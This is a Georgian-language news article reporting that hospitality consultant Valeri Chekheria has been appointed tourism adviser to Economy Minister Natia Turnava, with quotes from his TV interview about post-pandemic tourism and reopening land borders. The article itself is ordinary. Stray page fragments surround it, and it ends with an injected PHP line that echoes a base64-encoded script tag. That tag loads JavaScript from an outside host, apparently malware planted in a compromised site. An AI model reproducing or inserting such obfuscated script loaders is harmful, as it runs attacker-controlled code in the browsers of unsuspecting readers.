celsiusi
ავერსი საქკაბელი
ამერიკული კომპანია Zeze Hospitality-ის მთავარი კონსულტანტი და კომპანია Hospitality Projects-ის დამფუძნებელი, მსოფლიოს ეკონომიკური ფორუმის Young Global Leaders-ის წევრი ვალერი ჩეხერია ეკონომიკისა და მდგრადი განვითარების მინისტრის ნათია თურნავას კონსულტანტად დაინიშნა. ვალერი ჩეხერია სამინისტროში ტურიზმის სექტორის გაძლიერების მიმართულებით იმუშავებს.  ინფორმაცია ამის შესახებ ეკონომიკის სამინისტრომ 25 მაისს გაავრცელა.
 
რა აქცენტებს გააკეთებს ვალერი ჩეხერია პოსტ-პანდემიურ პერიოდში ტურიზმის გასაძლიერებლად - ამ და სხვა საკითხებზე ნათია თურნავას ახალმა კონსულტანტმა „საქმიანი დილა"ს- ეთერში სტუმრობისას ისაუბრა.
 
წამყვანის კითხვაზე, რამდენად განსხვავებული იქნება მინისტრის კონსულტანტის პოზიცია, ტურიზმის ადმინისტრაციის ხელმძღვანელის მოვალეობებისგან და ხომ არ იყო შემოთავაზება აღნიშნულ ვაკანტურ პოზიციაზე, ვალერი ჩეხერია ადასტურებს, რომ შეთავაზება იყო.
 
„ვაფასებ მინისტრის ამ გადაწყვეტილებას. მე შევხვდი პრემიერ-მინისტრსაც და მათ ტურიზმის სასწრაფოდ ამუშავებისთვის ძალიან აქტიური შემართება აქვთ. ამისთვის კი ტურიზმის გაძლიერების ყველა რეკომენდაცია უნდა მივაწოდოთ მინისტრს და პრემიერს. ამ მიმართულებით (ტურიზმის ადმინისტრაციის ხელმძღვანელის პოზიციაზე) შემოთავაზება მქონდა, თუმცა მე ევროპასა და აშშ-იც ვმოღვაწეობ, სხვა საქმიანობითაც ძალიან დაკავებული ვარ და პარალელურ რეჟიმში ასე თანამშრომლობა ყველაზე სწორი იქნებოდა, რათა ის ტრენდები და ინოვაციები, რომელ კომპანიებშიც დღეს ვმუშაობ, წამომეღო და ქვეყნისთვის, მინისტრისა და პრემიერისთვის შემეთავაზებინა. ისინი გახსნილები არიან და ნამდვილად დიდი ენთუზიაზმია. ეს რომ არ დამენახა, მეც რეალურად ამ ნაბიჯს ვერ გადავდგამდი, რომ ვყოფილიყავი კონსულტანტი“, - განაცხადა ვალერი ჩეხერიამ.
 
მინისტრის კონსულტანტი ტურიზმის საკითხებში ამბობს, რომ დღეს ამ პოზიციაზე მუშაობა დიდი გამოწვევა და პასუხისმგებლობაა.
 
„საინტერესო გამოწვევაა დღეს ჩაიბარო ის პასუხისმგებლობა, რომ კონსულტაციები გაუწიო მინისტრს ტურიზმის მიმართულებით. მე მეხება ყველა ის ინოვაცია და სიახლე, რომლითაც უნდა აღვადგინოთ პოსტ-პანდემიური ტურიზმი, ფოკუსი გავაკეთოთ შიდა ტურიზმის განვითარება-გაძლიერებაზე. საკმაოდ დიდი გამოწვევები აქვს ყველა ქვეყანას, რადგან საკმაოდ რთულ პერიოდს გავდივართ. ტურიზმის ნაწილში მთელ მსოფლიოს სტარტი ერთი გვაქვს და გვინდა, რომ ვიყოთ პირველები. ამასთან, ვიცით როგორ ვიყოთ პირველები. მე ამ სფეროდან მოვდივარ და კერძო სექტორიდან ქვეყანაში ტურიზმის განვითარებაში აქტიურად ვიყავი ჩართული და ალბათ ამიტომ მიიღეს ეს გადაწყვეტილება, მიუხედავად იმისა, რომ არსებობს ტურიზმის ადმინისტრაცია, არის კურატორი მინისტრის მოადგილე.
 
ჩემი ჩართულობა იქნება იმაში, რომ კერძო სექტორის მიერ დანახული ტურისტების მოზიდვის საკითხი გააქტიურდეს. კერძო სექტორის მიერ საქართველოში ტურისტების შემოყვანის მიმართულებით დიდი გამოცდილება მაქვს. კომპანიამ, რომელშიც ვმუშაობდი ქვეყანაში ძალიან დიდი რაოდენობის ტურისტები შემოიყვანა“, - აღნიშნა ახალმა კონსულტანტმა და დასძინა, მინისტრისა და მისი რჩევით ტურიზმის აღსადგენად პირველი გადაწყვეტილებებიც მიღებულია.
 
„პირველი ნაბიჯები, რომელიც რეკომენდაციის დონეზე დავიწყეთ, გადადგმულია და დარწმუნებული ვარ, რომ ამ შემართებით და მხარდაჭერით თუ ვიქნებით, რომელიც ტურიზმის სექტორშია, ეს გამოგვივა. ქვეყანაში სასტუმრო და Hospitality ბიზნესში დიდი პროფესიონალები არიან და მათი დახმარებით შევძლებთ ქვეყანაში ის ბუმი და ჟრიამული დავაყენოთ, რაც ტურიზმში იყო.
 
შიდა პროცესებში არ ჩავერთვები. ნამდვილად იქნება კოორდინაცია მინისტრთან, მის მოადგილესთან თუ ტურიზმის ადმინისტრაციასთან, თუმცა მე უშუალოდ მინისტრთან მექნება რეკომენდაციები, რომელსაც რა საკვირველია ტურიზმის ადმინისტრაციასთან განვიხილავთ.
 
პირველ შეხვედრაზე, რომელიც პრემიერ-მინისტრთან შედგა, პანდემიის გათვალისწინებით სახმელეთო საზღვრების გახსნაზე იყო საუბარი და შედეგებმაც არ დააყოვნა. მინისტრთან ერთად დავაყენეთ საკითხი, იყო ამაზე მსჯელობა და მეორე დღეს საკითხი გადაწყდა“, - თქვა ეკონომიკის მინისტრის კონსულტანტმა.
 
წყარო: BMG
1321
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");